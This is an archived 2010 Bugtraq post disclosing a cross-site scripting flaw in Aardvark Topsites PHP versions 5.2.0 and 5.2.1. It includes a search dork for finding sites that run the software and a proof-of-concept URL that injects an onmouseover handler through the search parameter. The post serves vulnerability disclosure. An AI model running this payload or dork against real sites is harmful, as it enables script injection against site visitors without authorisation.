[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Aardvark Topsite XSS vulnerability

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Aardvark Topsite XSS vulnerability
From: Yam Mesicka <yammesicka@xxxxxxxxx>
Date: Sun, 24 Oct 2010 18:13:16 +0200

Hi,

I found XSS on Aardvark Topsites PHP system.
Dork: "Powered by Aardvark Topsites" "SQL Queries"
XSS PoC: 
site_path/index.php?a=search&q=%22%20onmouseover%3dalert(String.fromCharCode(88,83,83))%20par%3d%22
Can use POST to effect the "email", "title", "u" and "url" parameters
either on the same way.
Tested versions: 5.2.0 & 5.2.1 (might work on other versions also).

Haven't found a way to contact the admins/security department directly.
If more details are needed, please contact me.

Thank you,
- Yam Mesicka
- Israel
- www.mesicka.com

Prev by Date: [USN-1009-1] GNU C Library vulnerabilities
Next by Date: How Visual Studio Makes Your Applications Vulnerable to Binary Planting
Previous by thread: [USN-1009-1] GNU C Library vulnerabilities
Next by thread: How Visual Studio Makes Your Applications Vulnerable to Binary Planting
Index(es):
- Date
- Thread